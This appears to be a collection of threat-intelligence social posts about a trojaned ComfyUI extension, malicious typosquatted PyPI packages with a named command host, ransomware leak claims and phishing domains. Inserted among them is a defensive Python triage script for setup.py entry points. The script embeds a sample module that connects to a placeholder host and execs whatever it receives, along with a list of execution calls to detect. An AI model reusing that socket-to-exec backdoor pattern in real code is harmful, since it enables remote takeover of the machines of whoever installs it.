PSA: If you use ComfyUI_LLMVISION in ComfyUI, it was hacked by "Nullbulge Group" and had malware injected. It had an Async remote access trojan for Windows embedded in it.
"This repository provides integration of GPT-4 and Claude 3 models into ComfyUI, allowing for both image and text-based interactions within the ComfyUI workflow." #threatintel
You’re going to see some incredible media bias with the Synnovis ransomware incident as it impacts southern hospitals - whereas NHS Dumfries and Galloway are several months into their ongoing ransomware incident and barely any coverage. #threatintel
Reported 5 malicious #Python packages to #PyPI: numberpy, tqmmd, pandans, openpyexl, reqwestss all by the same user leemay1782.
All with the same "functionality": getting commands via a socket from dzgi0h7on1jhzdg0vknw9pp9309rxjl8.oastify[.]com and executing them.
I don't think I've seen setup.py entry_points used as a trigger mechanism before?
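A console-script entry point declared in setup.py is installed as a wrapper script that imports the named module and calls the named function, so a payload placed there fires when the user first runs the command rather than at install time. The triage below, an added example and not code from the original post or from the packages it names, parses a setup.py with the ast module, resolves each "module:function" entry point, and flags the target module when it both imports a network module and hands received data to exec/eval/subprocess. The two source strings are constructed samples (the package name, host and port are placeholders, not the real packages' contents).

```python
"""Static triage of an sdist: entry_points in setup.py -> does the target
module open a socket and execute what it receives?  Added example; the two
sample sources below are constructed, not taken from any real package."""
from __future__ import annotations
import ast
import re

# Constructed sample setup.py: registers one console script.
SAMPLE_SETUP_PY = '''
from setuptools import setup
setup(
    name="numbers-helper",
    version="0.0.1",
    packages=["numbers_helper"],
    entry_points={"console_scripts": ["numbers-helper = numbers_helper.cli:main"]},
)
'''

# Constructed sample target module: socket in, exec of whatever arrives.
# This is the shape the triage flags; host/port are placeholders.
SAMPLE_MODULE = '''
import socket

def main():
    s = socket.socket()
    s.connect(("example.invalid", 4444))
    exec(s.recv(4096).decode())
'''

NETWORK_MODULES = {"socket", "urllib", "http", "requests", "ssl"}
EXEC_CALLS = {"exec", "eval", "compile", "os.system", "os.popen",
              "subprocess.run", "subprocess.Popen", "subprocess.call",
              "subprocess.check_output"}
ENTRY_RE = re.compile(r"\s*[\w.-]+\s*=\s*([\w.]+:[\w.]+)")


def _callee(node: ast.AST) -> str | None:
    """Dotted name of a call target: 'exec', 'os.system', 'socket.socket'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def find_entry_points(setup_src: str) -> list[str]:
    """Return 'module:func' targets from entry_points= in the setup() call.
    Handles the dict-of-lists form and the INI-string form; a non-literal
    value (computed at runtime) is skipped and should be reviewed by hand."""
    targets: list[str] = []
    for node in ast.walk(ast.parse(setup_src)):
        if not (isinstance(node, ast.Call) and _callee(node.func) in ("setup", "setuptools.setup")):
            continue
        for kw in node.keywords:
            if kw.arg != "entry_points":
                continue
            try:
                value = ast.literal_eval(kw.value)
            except ValueError:
                continue
            groups = list(value.values()) if isinstance(value, dict) else [value]
            for group in groups:
                specs = group.splitlines() if isinstance(group, str) else list(group)
                for spec in specs:
                    m = ENTRY_RE.match(spec)
                    if m:
                        targets.append(m.group(1))
    return targets


def module_findings(module_src: str) -> set[str]:
    """Network imports and code-execution calls present in a module."""
    found: set[str] = set()
    for node in ast.walk(ast.parse(module_src)):
        if isinstance(node, ast.Import):
            names = [a.name for a in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            names = []
            if isinstance(node, ast.Call) and _callee(node.func) in EXEC_CALLS:
                found.add(f"exec:{_callee(node.func)}")
        for n in names:
            if n.split(".")[0] in NETWORK_MODULES:
                found.add(f"network:{n}")
    return found


def triage(setup_src: str, modules: dict[str, str]) -> dict[str, dict]:
    """Per entry point: findings in its target module, and 'suspicious' when
    the module both reaches the network and executes something."""
    report: dict[str, dict] = {}
    for target in find_entry_points(setup_src):
        src = modules.get(target.split(":")[0])
        if src is None:
            report[target] = {"findings": set(), "suspicious": False, "note": "module not found"}
            continue
        findings = module_findings(src)
        has_net = any(f.startswith("network:") for f in findings)
        has_exec = any(f.startswith("exec:") for f in findings)
        report[target] = {"findings": findings, "suspicious": has_net and has_exec}
    return report


if __name__ == "__main__":
    for target, result in triage(SAMPLE_SETUP_PY, {"numbers_helper.cli": SAMPLE_MODULE}).items():
        print(target, sorted(result["findings"]), "SUSPICIOUS" if result["suspicious"] else "ok")
```

Run it over an unpacked sdist by reading setup.py and the package modules into the `modules` dict (keyed by dotted module name). The check is deliberately coarse: a legitimate CLI that fetches a URL and shells out will also trip it, so treat a hit as "read this module", not as a verdict. A setup.py that executes code at import time is a separate, install-time trigger and is not covered by this entry-point check.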
Have a look, see what you think. How could I make it more useful to you?
It's generated using a custom-made graph-network abstraction layer I wrote in Python and then pulling some publicly available JSON files for the Intrusion Sets and Techniques.
A couple of days ago, LockBit had published an entry on their leaksite titled "telekom.com". I asked the Telekom press corps and they denied any incident.
Yesterday, LB also published the data allegedly from Telekom. I had a look at the files. So far, it seems that nothing in the 1.2 GByte directory on their file share has anything to do with Deutsche Telekom. It seems that in fact, they breached a client PC owned by a non-profit in Hamburg.
Seeing an actor register a bunch of domains through OwnRegistrar, protected by Cloudflare, that contain both "okta" and "segment" - several are already marked as active phishing sites.
On Thursday, my monitoring triggered for Leicester City Council’s network going offline again:
2024-06-07 21:03:32
They’ve not returned online since.
Their website now has a banner which says they are having “essential maintenance works”. The list of services is the same impacted by the ransomware incident.
Werewolves Group are a ransomware group who primarily attack Russian organisations, although they have hit orgs across Europe in total. They've been operating under the radar for a few months.
There are many ransomware operators who aren't in Russia and aren't being tracked properly, so I imagine the odds are the problem is going to keep spiralling into other regions. Shout out to Kazakhstan.
Russia is very very exposed in terms of cybersecurity and resiliency, as attacking local orgs there will get the local feds to bash your door in, so ransomware groups have left it untested. #threatintel